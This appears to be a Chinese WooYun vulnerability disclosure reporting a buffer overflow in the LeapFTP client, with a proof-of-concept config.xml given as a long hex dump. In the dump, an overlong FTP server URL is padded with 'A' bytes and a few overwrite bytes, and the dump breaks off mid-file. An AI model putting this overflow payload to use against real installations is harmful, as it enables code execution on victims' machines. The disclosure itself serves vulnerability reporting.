漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-021185
漏洞标题:leapftp缓冲区溢出代码执行漏洞
相关厂商:LeapWare
漏洞作者: cssembly
提交时间:2013-04-03 11:52
修复时间:2013-07-02 11:53
公开时间:2013-07-02 11:53
漏洞类型:远程代码执行
危害等级:高
自评Rank:12
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-04-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-07-02: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
leapftp设计缺陷,存在溢出漏洞
详细说明:
由于未对服务器地址做有效性验证,当输入恶意地址链接时,导致代码执行漏洞
漏洞证明:
修改config.xml内容为如下数据:
0x3C, 0x6B, 0x65, 0x65, 0x70, 0x61, 0x6C, 0x69,
0x76, 0x65, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x63,
0x6D, 0x64, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x4C, 0x49, 0x53, 0x54, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x63, 0x6D, 0x64,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x4E,
0x4F, 0x4F, 0x50, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x3C, 0x63, 0x6D, 0x64, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x3D, 0x22, 0x50, 0x57, 0x44,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C,
0x63, 0x6D, 0x64, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x52, 0x45, 0x53, 0x54, 0x20, 0x30,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F,
0x6B, 0x65, 0x65, 0x70, 0x61, 0x6C, 0x69, 0x76,
0x65, 0x3E, 0x0D, 0x0A, 0x3C, 0x74, 0x72, 0x61,
0x6E, 0x73, 0x66, 0x65, 0x72, 0x3E, 0x0D, 0x0A,
0x09, 0x3C, 0x61, 0x73, 0x63, 0x69, 0x69, 0x3E,
0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C,
0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22,
0x2A, 0x2E, 0x61, 0x73, 0x63, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69,
0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D,
0x22, 0x2A, 0x2E, 0x62, 0x61, 0x74, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x63, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69,
0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D,
0x22, 0x2A, 0x2E, 0x63, 0x70, 0x70, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x63, 0x73, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x64, 0x68, 0x74, 0x6D,
0x2A, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D,
0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x64,
0x69, 0x7A, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20,
0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E,
0x64, 0x70, 0x72, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65,
0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A,
0x2E, 0x68, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20,
0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E,
0x68, 0x70, 0x70, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65,
0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A,
0x2E, 0x68, 0x74, 0x6D, 0x2A, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69,
0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D,
0x22, 0x2A, 0x2E, 0x69, 0x6E, 0x69, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x6A, 0x61, 0x76, 0x2A,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09,
0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61,
0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x6C, 0x6F,
0x67, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D,
0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x6D,
0x33, 0x75, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20,
0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E,
0x6E, 0x66, 0x6F, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65,
0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A,
0x2E, 0x70, 0x61, 0x73, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C,
0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22,
0x2A, 0x2E, 0x70, 0x68, 0x70, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69,
0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D,
0x22, 0x2A, 0x2E, 0x73, 0x66, 0x76, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x73, 0x71, 0x6C, 0x22,
0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C,
0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73,
0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x74, 0x78, 0x74,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09,
0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61,
0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x78, 0x6D,
0x6C, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D,
0x61, 0x73, 0x6B, 0x3D, 0x22, 0x6D, 0x61, 0x6B,
0x65, 0x66, 0x69, 0x6C, 0x65, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x2F, 0x61, 0x73,
0x63, 0x69, 0x69, 0x3E, 0x0D, 0x0A, 0x09, 0x3C,
0x70, 0x72, 0x69, 0x6F, 0x72, 0x69, 0x74, 0x79,
0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69,
0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D,
0x22, 0x2A, 0x2E, 0x64, 0x69, 0x7A, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x6D, 0x33, 0x75, 0x22,
0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C,
0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73,
0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x6E, 0x66, 0x6F,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09,
0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61,
0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x73, 0x66,
0x76, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x2F, 0x70, 0x72, 0x69, 0x6F, 0x72, 0x69,
0x74, 0x79, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x74,
0x72, 0x61, 0x6E, 0x73, 0x66, 0x65, 0x72, 0x3E,
0x0D, 0x0A, 0x3C, 0x72, 0x65, 0x63, 0x65, 0x6E,
0x74, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x73, 0x69,
0x74, 0x65, 0x20, 0x75, 0x72, 0x6C, 0x3D, 0x22,
0x66, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x31, 0x32,
0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x5C,
0x41, 0x42, 0x42, 0x42, 0x42, 0x42, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x74, 0x8E, 0x41, 0x41, 0x67,
0x6A, 0x51, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x3C, 0x2F, 0x72, 0x65, 0x63, 0x65, 0x6E, 0x74,
0x3E, 0x0D, 0x0A, 0x3C, 0x73, 0x65, 0x73, 0x73,
0x69, 0x6F, 0x6E, 0x3E, 0x0D, 0x0A, 0x09, 0x3C,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x3D, 0x22, 0x77, 0x69, 0x6E,
0x64, 0x6F, 0x77, 0x70, 0x6F, 0x73, 0x22, 0x20,
0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x36,
0x34, 0x2C, 0x31, 0x35, 0x39, 0x2C, 0x34, 0x39,
0x36, 0x2C, 0x39, 0x36, 0x34, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79,
0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x6F, 0x70, 0x74, 0x69, 0x6F, 0x6E,
0x73, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65,
0x3D, 0x22, 0x30, 0x30, 0x31, 0x31, 0x33, 0x31,
0x31, 0x30, 0x31, 0x30, 0x31, 0x30, 0x31, 0x30,
0x30, 0x30, 0x30, 0x31, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x6C, 0x6F, 0x63, 0x61, 0x6C, 0x63, 0x6F,
0x6C, 0x75, 0x6D, 0x6E, 0x73, 0x22, 0x20, 0x76,
0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x31, 0x31,
0x31, 0x31, 0x31, 0x31, 0x31, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79,
0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x6C, 0x6F, 0x63, 0x61, 0x6C, 0x66,
0x69, 0x6C, 0x74, 0x65, 0x72, 0x22, 0x20, 0x76,
0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x71, 0x75, 0x65, 0x75, 0x65,
0x63, 0x6F, 0x6C, 0x73, 0x22, 0x20, 0x76, 0x61,
0x6C, 0x75, 0x65, 0x3D, 0x22, 0x38, 0x30, 0x2C,
0x38, 0x30, 0x2C, 0x31, 0x30, 0x30, 0x2C, 0x31,
0x35, 0x30, 0x2C, 0x31, 0x35, 0x30, 0x2C, 0x39,
0x30, 0x2C, 0x38, 0x30, 0x2C, 0x38, 0x30, 0x2C,
0x38, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x73,
0x63, 0x68, 0x65, 0x64, 0x75, 0x6C, 0x65, 0x63,
0x6F, 0x6C, 0x73, 0x22, 0x20, 0x76, 0x61, 0x6C,
0x75, 0x65, 0x3D, 0x22, 0x31, 0x30, 0x30, 0x2C,
0x31, 0x30, 0x30, 0x2C, 0x31, 0x35, 0x30, 0x2C,
0x31, 0x35, 0x30, 0x2C, 0x31, 0x33, 0x30, 0x2C,
0x31, 0x33, 0x30, 0x2C, 0x39, 0x35, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x72, 0x65, 0x6D, 0x6F, 0x74,
0x65, 0x63, 0x6F, 0x6C, 0x75, 0x6D, 0x6E, 0x73,
0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D,
0x22, 0x31, 0x31, 0x31, 0x30, 0x30, 0x30, 0x22,
0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C,
0x61, 0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61,
0x6D, 0x65, 0x3D, 0x22, 0x68, 0x69, 0x73, 0x74,
0x6F, 0x72, 0x79, 0x63, 0x6F, 0x6C, 0x73, 0x22,
0x20, 0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22,
0x31, 0x35, 0x30, 0x2C, 0x33, 0x35, 0x30, 0x2C,
0x36, 0x30, 0x2C, 0x31, 0x34, 0x30, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x75, 0x72, 0x6C, 0x63, 0x6F,
0x6C, 0x73, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75,
0x65, 0x3D, 0x22, 0x36, 0x30, 0x30, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x6C, 0x6F, 0x67, 0x63, 0x6F,
0x6C, 0x73, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75,
0x65, 0x3D, 0x22, 0x31, 0x35, 0x30, 0x2C, 0x38,
0x30, 0x2C, 0x31, 0x32, 0x30, 0x2C, 0x31, 0x36,
0x30, 0x2C, 0x31, 0x36, 0x30, 0x2C, 0x31, 0x35,
0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x20,
0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x71, 0x75,
0x65, 0x75, 0x65, 0x68, 0x65, 0x69, 0x67, 0x68,
0x74, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65,
0x3D, 0x22, 0x31, 0x35, 0x30, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79,
0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x6C, 0x6F, 0x67, 0x77, 0x69, 0x64,
0x74, 0x68, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75,
0x65, 0x3D, 0x22, 0x31, 0x30, 0x30, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x70, 0x72, 0x65, 0x66, 0x70,
0x61, 0x67, 0x65, 0x22, 0x20, 0x76, 0x61, 0x6C,
0x75, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79,
0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x74, 0x72, 0x61, 0x6E, 0x73, 0x66,
0x65, 0x72, 0x6D, 0x6F, 0x64, 0x65, 0x22, 0x20,
0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x30,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x3D, 0x22, 0x63, 0x6F, 0x6D,
0x70, 0x6C, 0x65, 0x74, 0x65, 0x6D, 0x6F, 0x64,
0x65, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65,
0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F, 0x75,
